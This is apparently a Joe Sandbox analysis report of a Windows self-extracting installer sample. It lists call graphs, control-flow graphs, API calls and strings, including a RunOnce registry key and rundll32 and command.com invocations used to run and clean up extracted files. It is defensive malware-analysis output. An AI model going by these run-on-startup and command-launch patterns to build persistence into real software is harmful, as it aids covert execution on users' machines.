2773 13fb658d0 2772->2773 2772->2777 2774 13fb65350 CloseHandle 2773->2774 2773->2777 2775 13fb658f2 2774->2775 2776 13fb658f7 #23 2775->2776 2775->2777 2776->2777 2777->2769 2779 13fb61647 2778->2779 2867 13fb6155c 2779->2867 2782 13fb673cc CharPrevA 2783 13fb616da 2782->2783 2784 13fb6755c 2 API calls 2783->2784 2785 13fb61785 2784->2785 2786 13fb6178e CompareStringA 2785->2786 2787 13fb6196b 2785->2787 2786->2787 2789 13fb617bb GetFileAttributesA 2786->2789 2788 13fb6755c 2 API calls 2787->2788 2790 13fb61978 2788->2790 2791 13fb61943 2789->2791 2792 13fb617cf 2789->2792 2793 13fb61981 CompareStringA 2790->2793 2794 13fb61a0f LocalAlloc 2790->2794 2797 13fb64a70 24 API calls 2791->2797 2792->2791 2795 13fb6155c 2 API calls 2792->2795 2793->2794 2804 13fb619aa 2793->2804 2794->2791 2796 13fb61a29 GetFileAttributesA 2794->2796 2798 13fb617f3 2795->2798 2802 13fb61a39 2796->2802 2816 13fb618a5 2797->2816 2800 13fb6181d LocalAlloc 2798->2800 2805 13fb6155c 2 API calls 2798->2805 2799 13fb61b09 2803 13fb67c20 7 API calls 2799->2803 2800->2791 2801 13fb61839 GetPrivateProfileIntA GetPrivateProfileStringA 2800->2801 2806 13fb618da 2801->2806 2801->2816 2814 13fb61a8c 2802->2814 2807 13fb61b21 2803->2807 2804->2804 2808 13fb619cb LocalAlloc 2804->2808 2805->2800 2810 13fb618eb GetShortPathNameA 2806->2810 2811 13fb6190a 2806->2811 2807->2635 2808->2791 2812 13fb619f6 2808->2812 2810->2811 2815 13fb61144 _vsnprintf 2811->2815 2813 13fb61144 _vsnprintf 2812->2813 2813->2816 2875 13fb62830 2814->2875 2815->2816 2816->2799 2818 13fb61cd8 2817->2818 2819 13fb61ece 2817->2819 2822 13fb61144 _vsnprintf 2818->2822 2824 13fb61d29 2818->2824 2820 13fb67c20 7 API calls 2819->2820 2821 13fb61edd 2820->2821 2821->2635 2823 13fb61cf8 RegQueryValueExA 2822->2823 2823->2818 2823->2824 2825 13fb61d44 GetSystemDirectoryA 2824->2825 2826 13fb61d2d RegCloseKey 2824->2826 2827 13fb673cc CharPrevA 2825->2827 2826->2819 2828 13fb61d62 LoadLibraryA 2827->2828 2829 13fb61d78 GetProcAddress FreeLibrary 2828->2829 2830 13fb61e2f GetModuleFileNameA 2828->2830 2829->2830 2831 13fb61da4 GetSystemDirectoryA 2829->2831 2832 13fb61e48 RegCloseKey 2830->2832 2835 13fb61dc8 2830->2835 2833 13fb61db5 2831->2833 2831->2835 2832->2819 2834 13fb673cc CharPrevA 2833->2834 2834->2835 2835->2835 2836 13fb61df1 LocalAlloc 2835->2836 2837 13fb61e55 2836->2837 2838 13fb61e0f 2836->2838 2840 13fb61144 _vsnprintf 2837->2840 2839 13fb64a70 24 API calls 2838->2839 2841 13fb61e2d 2839->2841 2842 13fb61e8b 2840->2842 2841->2832 2842->2842 2843 13fb61e94 RegSetValueExA RegCloseKey LocalFree 2842->2843 2843->2819 2845 13fb645d3 GetLastError GetLastError FormatMessageA 2844->2845 2846 13fb644fa WaitForSingleObject GetExitCodeProcess 2844->2846 2847 13fb64a70 24 API calls 2845->2847 2850 13fb64525 2846->2850 2848 13fb6463f 2847->2848 2854 13fb67c20 7 API calls 2848->2854 2851 13fb64556 CloseHandle CloseHandle 2850->2851 2852 13fb62174 18 API calls 2850->2852 2851->2848 2853 13fb645ca 2851->2853 2855 13fb64579 2852->2855 2853->2848 2856 13fb64652 2854->2856 2855->2851 2856->2635 2858 13fb67271 2857->2858 2859 13fb673cc CharPrevA 2858->2859 2860 13fb672af GetFileAttributesA 2859->2860 2861 13fb672d6 LoadLibraryA 2860->2861 2862 13fb672bf 2860->2862 2864 13fb672e3 2861->2864 2862->2861 2863 13fb672c3 LoadLibraryExA 2862->2863 2863->2864 2865 13fb67c20 7 API calls 2864->2865 2866 13fb672f3 2865->2866 2866->2654 2868 13fb6157d 2867->2868 2870 13fb61595 2868->2870 2871 13fb615c5 2868->2871 2888 13fb674ec 2868->2888 2872 13fb674ec 2 API calls 2870->2872 2871->2782 2871->2783 2873 13fb615a3 2872->2873 2873->2871 2874 13fb674ec 2 API calls 2873->2874 2874->2873 2876 13fb629b4 2875->2876 2877 13fb62864 GetModuleFileNameA 2875->2877 2878 13fb67c20 7 API calls 2876->2878 2877->2876 2887 13fb62886 2877->2887 2879 13fb629c7 2878->2879 2879->2799 2880 13fb6288a IsDBCSLeadByte 2880->2887 2881 13fb62992 CharNextA 2884 13fb6299e CharNextA 2881->2884 2882 13fb628a9 CharNextA CharUpperA 2883 13fb6293d CharUpperA 2882->2883 2882->2887 2883->2887 2884->2876 2884->2880 2886 13fb628de CharPrevA 2886->2887 2887->2880 2887->2881 2887->2882 2887->2884 2887->2886 2893 13fb6745c 2887->2893 2889 13fb67504 2888->2889 2890 13fb6750e IsDBCSLeadByte 2889->2890 2891 13fb6753f 2889->2891 2892 13fb6752e CharNextA 2889->2892 2890->2889 2890->2891 2891->2868 2892->2889 2894 13fb67474 2893->2894 2894->2894 2895 13fb6747d CharPrevA 2894->2895 2896 13fb67493 CharPrevA 2895->2896 2897 13fb674a4 2896->2897 2898 13fb6748b 2896->2898 2899 13fb674cb 2897->2899 2900 13fb674bf CharNextA 2897->2900 2901 13fb674ae CharPrevA 2897->2901 2898->2896 2898->2897 2899->2887 2900->2899 2901->2899 2901->2900 2903 13fb620f7 2902->2903 2904 13fb62149 2902->2904 2906 13fb673cc CharPrevA 2903->2906 2905 13fb67c20 7 API calls 2904->2905 2907 13fb6215b 2905->2907 2908 13fb6210a WritePrivateProfileStringA _lopen 2906->2908 2907->2339 2908->2904 2909 13fb62131 _llseek _lclose 2908->2909 2909->2904 3050 13fb632b0 3051 13fb63379 3050->3051 3053 13fb632c2 3050->3053 3052 13fb63382 SendDlgItemMessageA 3051->3052 3055 13fb63372 3051->3055 3052->3055 3054 13fb632cf 3053->3054 3056 13fb632f8 GetDesktopWindow 3053->3056 3054->3055 3057 13fb632f0 EndDialog 3054->3057 3058 13fb64938 14 API calls 3056->3058 3057->3055 3059 13fb63309 6 API calls 3058->3059 3059->3055

                                                                    Callgraph

                                                                    • Executed
                                                                    • Not Executed
                                                                    • Opacity -> Relevance
                                                                    • Disassembly available
                                                                    callgraph 0 Function_000000013FB66998 1 Function_000000013FB66918 0->1 7 Function_000000013FB67C20 0->7 23 Function_000000013FB67DF8 0->23 36 Function_000000013FB64A70 0->36 40 Function_000000013FB674EC 0->40 48 Function_000000013FB6755C 0->48 62 Function_000000013FB673CC 0->62 2 Function_000000013FB67614 3 Function_000000013FB68114 4 Function_000000013FB65814 6 Function_000000013FB64FA0 4->6 4->7 58 Function_000000013FB65350 4->58 5 Function_000000013FB68212 65 Function_000000013FB6824C 5->65 6->36 55 Function_000000013FB67C44 7->55 8 Function_000000013FB639A0 8->2 8->7 8->36 41 Function_000000013FB676D8 8->41 83 Function_000000013FB62628 8->83 9 Function_000000013FB63720 13 Function_000000013FB63908 9->13 9->36 68 Function_000000013FB64938 9->68 10 Function_000000013FB68020 11 Function_000000013FB6229C 11->7 11->36 12 Function_000000013FB61008 14 Function_000000013FB67304 14->36 15 Function_000000013FB61490 15->7 15->68 16 Function_000000013FB67110 16->7 16->62 17 Function_000000013FB68310 18 Function_000000013FB65C0C 18->36 76 Function_000000013FB64CC0 18->76 19 Function_000000013FB6648C 19->12 19->36 19->62 20 Function_000000013FB63D0C 20->14 20->36 20->76 21 Function_000000013FB615F8 21->7 21->12 31 Function_000000013FB61080 21->31 21->36 21->48 49 Function_000000013FB6155C 21->49 56 Function_000000013FB61144 21->56 21->62 93 Function_000000013FB62830 21->93 22 Function_000000013FB64478 22->7 24 Function_000000013FB62174 22->24 22->36 23->55 78 Function_000000013FB620C0 24->78 25 Function_000000013FB67880 25->10 51 Function_000000013FB67FC8 25->51 26 Function_000000013FB67F00 27 Function_000000013FB64E00 27->14 28 Function_000000013FB61F00 28->7 28->28 28->31 28->62 29 Function_000000013FB65280 29->13 30 Function_000000013FB65480 30->6 30->7 30->27 37 Function_000000013FB64D70 30->37 30->58 63 Function_000000013FB656CC 30->63 90 Function_000000013FB64EB0 30->90 32 Function_000000013FB68080 42 Function_000000013FB680E0 32->42 92 Function_000000013FB68030 32->92 33 Function_000000013FB63680 33->68 34 Function_000000013FB64768 34->12 34->36 35 Function_000000013FB629E4 35->24 35->36 53 Function_000000013FB630C4 35->53 57 Function_000000013FB61B44 35->57 81 Function_000000013FB62E28 35->81 84 Function_000000013FB62B24 35->84 36->2 36->7 36->12 36->41 36->56 37->12 37->31 38 Function_000000013FB6466C 38->36 38->76 39 Function_000000013FB67F6C 41->7 43 Function_000000013FB682E0 44 Function_000000013FB63260 45 Function_000000013FB67960 46 Function_000000013FB675E0 47 Function_000000013FB651E0 49->40 50 Function_000000013FB6745C 51->39 52 Function_000000013FB62448 52->7 52->12 52->62 53->7 53->28 53->50 54 Function_000000013FB65D44 54->7 54->12 54->56 54->62 57->7 57->36 59 Function_000000013FB65450 60 Function_000000013FB63E4C 60->7 60->21 60->22 60->36 60->56 60->62 67 Function_000000013FB61C38 60->67 60->76 80 Function_000000013FB6723C 60->80 61 Function_000000013FB65E4C 61->7 61->19 61->54 61->62 87 Function_000000013FB665B0 61->87 62->31 64 Function_000000013FB65B4C 64->36 64->76 88 Function_000000013FB66FB0 64->88 66 Function_000000013FB67BC9 67->7 67->36 67->56 67->62 68->7 69 Function_000000013FB67FB2 70 Function_000000013FB65940 70->4 70->36 70->76 71 Function_000000013FB67F40 72 Function_000000013FB64740 73 Function_000000013FB680C0 74 Function_000000013FB612C0 74->7 75 Function_000000013FB611C0 74->75 75->7 77 Function_000000013FB653C0 78->7 78->62 79 Function_000000013FB633C0 79->19 79->34 79->36 79->62 79->68 79->87 80->7 80->62 81->7 81->14 81->18 81->20 81->24 81->36 81->38 81->60 81->62 81->64 81->70 82 Function_000000013FB66028 81->82 81->87 81->88 82->7 82->11 82->14 82->36 82->61 82->62 82->76 82->87 83->52 84->0 84->7 84->8 84->14 84->28 84->36 84->74 84->76 85 Function_000000013FB62324 85->7 85->36 85->56 86 Function_000000013FB679B0 86->3 86->32 86->35 86->71 87->7 87->36 87->85 88->7 88->56 89 Function_000000013FB632B0 89->68 90->12 90->36 91 Function_000000013FB670B0 93->7 93->12 93->50

                                                                    Executed Functions

                                                                    Function 000000013FB63E4C Relevance: 56.4, APIs: 18, Strings: 14, Instructions: 360registrylibraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 13fb63e4c-13fb63e9e 1 13fb63ec1-13fb63ec9 0->1 2 13fb63ea0-13fb63ebb call 13fb64cc0 0->2 4 13fb63ecd-13fb63eef memset 1->4 2->1 9 13fb63fd6-13fb63fff call 13fb64a70 2->9 6 13fb63ef5-13fb63f10 call 13fb64cc0 4->6 7 13fb64004-13fb64017 4->7 6->9 17 13fb63f16-13fb63f1c 6->17 8 13fb6401b-13fb64025 7->8 11 13fb64027-13fb6402d 8->11 12 13fb64039-13fb64044 8->12 23 13fb6424c 9->23 11->12 15 13fb6402f-13fb64037 11->15 16 13fb64047-13fb6404a 12->16 15->8 15->12 19 13fb640a4-13fb640b9 call 13fb615f8 16->19 20 13fb6404c-13fb64064 call 13fb64cc0 16->20 21 13fb63f25-13fb63f28 17->21 22 13fb63f1e-13fb63f23 17->22 19->23 37 13fb640bf-13fb640c6 19->37 20->9 36 13fb6406a-13fb64071 20->36 27 13fb63f35-13fb63f37 21->27 28 13fb63f2a-13fb63f33 21->28 26 13fb63f3d 22->26 24 13fb6424e-13fb6427d call 13fb67c20 23->24 32 13fb63f40-13fb63f43 26->32 27->32 33 13fb63f39 27->33 28->26 32->16 38 13fb63f49-13fb63f53 32->38 33->26 41 13fb64077-13fb6409e CompareStringA 36->41 42 13fb64332-13fb64339 36->42 43 13fb640c8-13fb640cf 37->43 44 13fb640e6-13fb640e8 37->44 39 13fb63f55-13fb63f58 38->39 40 13fb63fb3-13fb63fb6 38->40 47 13fb63f63-13fb63f65 39->47 48 13fb63f5a-13fb63f61 39->48 40->19 51 13fb63fbc-13fb63fd4 call 13fb64cc0 40->51 41->19 41->42 45 13fb6433f-13fb64346 42->45 46 13fb64469-13fb6446b 42->46 43->44 52 13fb640d1-13fb640d8 43->52 49 13fb64203-13fb6420b 44->49 50 13fb640ee-13fb640f5 44->50 45->46 54 13fb6434c-13fb64375 RegOpenKeyExA 45->54 46->24 47->23 56 13fb63f6b 47->56 55 13fb63f72-13fb63f83 call 13fb64cc0 48->55 59 13fb64243-13fb64246 LocalFree 49->59 60 13fb6420d-13fb64214 call 13fb64478 49->60 57 13fb640fb-13fb640fd 50->57 58 13fb642f9-13fb6432d call 13fb64a70 LocalFree 50->58 51->9 51->16 52->44 53 13fb640da-13fb640dc 52->53 53->50 62 13fb640de-13fb640e1 call 13fb61c38 53->62 54->46 63 13fb6437b-13fb643b4 RegQueryValueExA 54->63 55->9 78 13fb63f85-13fb63faf CompareStringA 55->78 56->55 57->49 65 13fb64103-13fb6410a 57->65 58->23 59->23 74 13fb64219-13fb6421b 60->74 62->44 70 13fb6445e-13fb64463 RegCloseKey 63->70 71 13fb643ba-13fb643e3 memset GetSystemDirectoryA 63->71 65->49 73 13fb64110-13fb6411b call 13fb6723c 65->73 70->46 76 13fb643e5-13fb643f6 call 13fb673cc 71->76 77 13fb643fb-13fb64424 call 13fb61144 71->77 86 13fb642d4-13fb642f7 call 13fb64a70 73->86 87 13fb64121-13fb64137 GetProcAddress 73->87 74->59 80 13fb6421d-13fb6422d LocalFree 74->80 76->77 88 13fb6442b-13fb64432 77->88 78->40 80->42 84 13fb64233-13fb64238 80->84 84->4 98 13fb642aa-13fb642cf LocalFree GetLastError 86->98 90 13fb6413d-13fb6418b 87->90 91 13fb6427e-13fb642a4 call 13fb64a70 FreeLibrary 87->91 88->88 93 13fb64434-13fb64458 RegSetValueExA 88->93 95 13fb64195-13fb6419d 90->95 96 13fb6418d-13fb64191 90->96 91->98 93->70 99 13fb641a7-13fb641a9 95->99 100 13fb6419f-13fb641a3 95->100 96->95 98->23 101 13fb641b3-13fb641bb 99->101 102 13fb641ab-13fb641af 99->102 100->99 103 13fb641c5-13fb641c7 101->103 104 13fb641bd-13fb641c1 101->104 102->101 105 13fb641d1-13fb641f4 103->105 106 13fb641c9-13fb641cd 103->106 104->103 108 13fb641f6-13fb64201 FreeLibrary 105->108 109 13fb6423d FreeLibrary 105->109 106->105 108->80 109->59
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Free$Resource$Local$Library$CompareFindStringValuememset$AddressCloseDirectoryErrorLastLoadLockOpenProcQuerySizeofSystemmemcpy_s
                                                                    • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$tha$wextract_cleanup0
                                                                    • API String ID: 4182703008-1896170548
                                                                    • Opcode ID: 9fbedc8ee68849e796393d59cf24a39954ca5b20f47fe15cbd13ed5894424a0e
                                                                    • Instruction ID: 9ea9c219b04611c92a42380e19669ca2f93f26a7609429b0fe2288a284144083
                                                                    • Opcode Fuzzy Hash: 9fbedc8ee68849e796393d59cf24a39954ca5b20f47fe15cbd13ed5894424a0e
                                                                    • Instruction Fuzzy Hash: 14F172F2A14A81C6FB609F65E8407EAF7A0F7447A8F54013EDA4943AACDB79C746C700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB61C38 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 169registrylibrarymemoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                    • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                    • API String ID: 178549006-1367052505
                                                                    • Opcode ID: 086f7c6c0e1ddd0f103fce1b769f8d6c6a2bd86ba3a3403e30a996cf38a0207b
                                                                    • Instruction ID: 7dd7dc1a92c00ac26efa26a085c2f4accc65344eef3c7bac0479a1e2821c8c0e
                                                                    • Opcode Fuzzy Hash: 086f7c6c0e1ddd0f103fce1b769f8d6c6a2bd86ba3a3403e30a996cf38a0207b
                                                                    • Instruction Fuzzy Hash: 1A714DB2B14B8496EB109F61E8547DAF3A5F784BA4F50113AD98E47BACDF38C606C740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB615F8 Relevance: 37.1, APIs: 10, Strings: 11, Instructions: 340memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 142 13fb615f8-13fb61642 143 13fb61647-13fb61651 142->143 144 13fb61666-13fb61678 143->144 145 13fb61653-13fb61659 143->145 147 13fb61687-13fb6168e 144->147 148 13fb6167a-13fb61685 144->148 145->144 146 13fb6165b-13fb61664 145->146 146->143 146->144 149 13fb61692-13fb616b0 call 13fb6155c 147->149 148->149 152 13fb616b2 149->152 153 13fb6171e-13fb61736 149->153 155 13fb616b5-13fb616bc 152->155 154 13fb6173b-13fb61745 153->154 156 13fb61747-13fb6174d 154->156 157 13fb6175a-13fb61773 call 13fb673cc 154->157 155->155 158 13fb616be-13fb616c2 155->158 156->157 159 13fb6174f-13fb61758 156->159 162 13fb61778-13fb61788 call 13fb6755c 157->162 158->153 161 13fb616c4-13fb616cb 158->161 159->154 159->157 163 13fb616d2-13fb616d4 161->163 164 13fb616cd-13fb616d0 161->164 170 13fb6178e-13fb617b5 CompareStringA 162->170 171 13fb6196b-13fb6197b call 13fb6755c 162->171 163->153 167 13fb616d6-13fb616d8 163->167 164->163 166 13fb616da-13fb616ea 164->166 169 13fb616ef-13fb616f9 166->169 167->153 167->166 172 13fb6170e-13fb6171c 169->172 173 13fb616fb-13fb61701 169->173 170->171 175 13fb617bb-13fb617c9 GetFileAttributesA 170->175 180 13fb61981-13fb619a8 CompareStringA 171->180 181 13fb61a0f-13fb61a27 LocalAlloc 171->181 172->162 173->172 176 13fb61703-13fb6170c 173->176 178 13fb61943-13fb6194b 175->178 179 13fb617cf-13fb617d7 175->179 176->169 176->172 183 13fb61950-13fb61966 call 13fb64a70 178->183 179->178 182 13fb617dd-13fb617f9 call 13fb6155c 179->182 180->181 184 13fb619aa-13fb619b1 180->184 186 13fb619e6-13fb619f1 181->186 187 13fb61a29-13fb61a37 GetFileAttributesA 181->187 198 13fb6181d-13fb61833 LocalAlloc 182->198 199 13fb617fb-13fb61818 call 13fb6155c 182->199 195 13fb61b12-13fb61b3b call 13fb67c20 183->195 192 13fb619b4-13fb619bb 184->192 186->183 189 13fb61ab6-13fb61ac0 187->189 190 13fb61a39-13fb61a3b 187->190 197 13fb61ac7-13fb61ad1 189->197 190->189 194 13fb61a3d-13fb61a4e 190->194 192->192 196 13fb619bd 192->196 201 13fb61a55-13fb61a5f 194->201 203 13fb619c2-13fb619c9 196->203 204 13fb61ae6-13fb61af1 197->204 205 13fb61ad3-13fb61ad9 197->205 198->186 200 13fb61839-13fb618a3 GetPrivateProfileIntA GetPrivateProfileStringA 198->200 199->198 208 13fb618a5-13fb618d5 call 13fb61008 * 2 200->208 209 13fb618da-13fb618e9 200->209 210 13fb61a74-13fb61a85 201->210 211 13fb61a61-13fb61a67 201->211 203->203 213 13fb619cb-13fb619e4 LocalAlloc 203->213 207 13fb61af4-13fb61b04 call 13fb62830 204->207 205->204 214 13fb61adb-13fb61ae4 205->214 222 13fb61b09-13fb61b0d 207->222 208->222 219 13fb618eb-13fb61908 GetShortPathNameA 209->219 220 13fb6190a 209->220 210->207 218 13fb61a87-13fb61a8a 210->218 211->210 217 13fb61a69-13fb61a72 211->217 213->186 221 13fb619f6-13fb61a0a call 13fb61144 213->221 214->197 214->204 217->201 217->210 218->207 224 13fb61a8c-13fb61ab4 call 13fb61080 * 2 218->224 225 13fb61911-13fb6193e call 13fb61144 219->225 220->225 221->222 222->195 224->207 225->222
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                    • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                    • API String ID: 383838535-3591563988
                                                                    • Opcode ID: 8d2c9183c473727e79f3868567cf13be57a801c48a812a4ca0eda7e59c6b39be
                                                                    • Instruction ID: 71ffaa89fa12ec41a3f6c89a424957855d315545d94342d89f8eaacad2551499
                                                                    • Opcode Fuzzy Hash: 8d2c9183c473727e79f3868567cf13be57a801c48a812a4ca0eda7e59c6b39be
                                                                    • Instruction Fuzzy Hash: E1E1AFB6B0578096EF118F24E8503EAE7A1E745BA8F54413ADA9D03B9DDB39C70BC700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB66028 Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 289memorystringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 236 13fb66028-13fb66082 call 13fb64cc0 LocalAlloc 239 13fb660c3-13fb660d7 call 13fb64cc0 236->239 240 13fb66084-13fb660b6 call 13fb64a70 GetLastError 236->240 246 13fb6610c-13fb66145 lstrcmpA LocalFree 239->246 247 13fb660d9-13fb6610a call 13fb64a70 LocalFree 239->247 245 13fb660bc-13fb660be 240->245 248 13fb66459-13fb66485 call 13fb67c20 245->248 250 13fb66147-13fb66149 246->250 251 13fb66192-13fb66198 246->251 247->245 256 13fb66156 250->256 257 13fb6614b-13fb66154 250->257 252 13fb66433-13fb66457 call 13fb67304 251->252 253 13fb6619e-13fb661a4 251->253 252->248 253->252 259 13fb661aa-13fb661c5 GetTempPathA 253->259 261 13fb66159-13fb66169 call 13fb65e4c 256->261 257->256 257->261 264 13fb661c7-13fb661d3 call 13fb65e4c 259->264 265 13fb66202-13fb6620e 259->265 269 13fb6616f-13fb6618d call 13fb64a70 261->269 270 13fb6642e-13fb66431 261->270 272 13fb661d8-13fb661da 264->272 267 13fb66211-13fb66214 265->267 271 13fb66219-13fb66223 267->271 269->245 270->248 274 13fb66225-13fb6622a 271->274 275 13fb66236-13fb66248 271->275 272->270 276 13fb661e0-13fb661ea call 13fb6229c 272->276 274->275 278 13fb6622c-13fb66234 274->278 279 13fb66400-13fb66423 GetWindowsDirectoryA call 13fb665b0 275->279 280 13fb6624e-13fb6625e GetDriveTypeA 275->280 276->265 289 13fb661ec-13fb661fc call 13fb65e4c 276->289 278->271 278->275 279->245 290 13fb66429 279->290 283 13fb66265-13fb66273 GetFileAttributesA 280->283 284 13fb66260-13fb66263 280->284 287 13fb66279-13fb6627c 283->287 288 13fb662fa-13fb6630d call 13fb665b0 283->288 284->283 284->287 292 13fb6627e-13fb66288 287->292 293 13fb662ea 287->293 300 13fb66331-13fb6633d call 13fb6229c 288->300 301 13fb6630f-13fb6631b call 13fb6229c 288->301 289->265 289->270 290->267 296 13fb662ee-13fb662f5 292->296 298 13fb6628a-13fb6629c 292->298 293->296 299 13fb663f7-13fb663fa 296->299 298->296 302 13fb6629e-13fb662c4 GetDiskFreeSpaceA 298->302 299->279 299->280 310 13fb6633f-13fb66347 GetWindowsDirectoryA 300->310 311 13fb6634d-13fb6636f call 13fb673cc GetFileAttributesA 300->311 301->293 309 13fb6631d-13fb6632f call 13fb665b0 301->309 302->293 305 13fb662c6-13fb662e1 MulDiv 302->305 305->293 308 13fb662e3-13fb662e8 305->308 308->288 308->293 309->293 309->300 310->311 316 13fb66371-13fb6637e CreateDirectoryA 311->316 317 13fb66380 311->317 318 13fb66383-13fb66385 316->318 317->318 319 13fb66387-13fb66396 318->319 320 13fb66398-13fb663b3 SetFileAttributesA 318->320 319->299 321 13fb663b6-13fb663c0 320->321 322 13fb663d4-13fb663f1 call 13fb65e4c 321->322 323 13fb663c2-13fb663c8 321->323 322->270 327 13fb663f3 322->327 323->322 324 13fb663ca-13fb663d2 323->324 324->321 324->322 327->299
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
                                                                    • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                    • API String ID: 3973824516-1687894704
                                                                    • Opcode ID: 3a816d39f8404eceacc9f53d27fff6f0972f8e2c600a2447ebf23cbd64aef1a2
                                                                    • Instruction ID: a39ec325346f0a99808b0a7a1cfb56aa8885e016b1bc0eba5498775fcd1dade7
                                                                    • Opcode Fuzzy Hash: 3a816d39f8404eceacc9f53d27fff6f0972f8e2c600a2447ebf23cbd64aef1a2
                                                                    • Instruction Fuzzy Hash: FDC183F2A1468082FB609F25E4507EAF7A2F795764F54403DDA894BA9DDB3DCA07CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB665B0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 216windowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
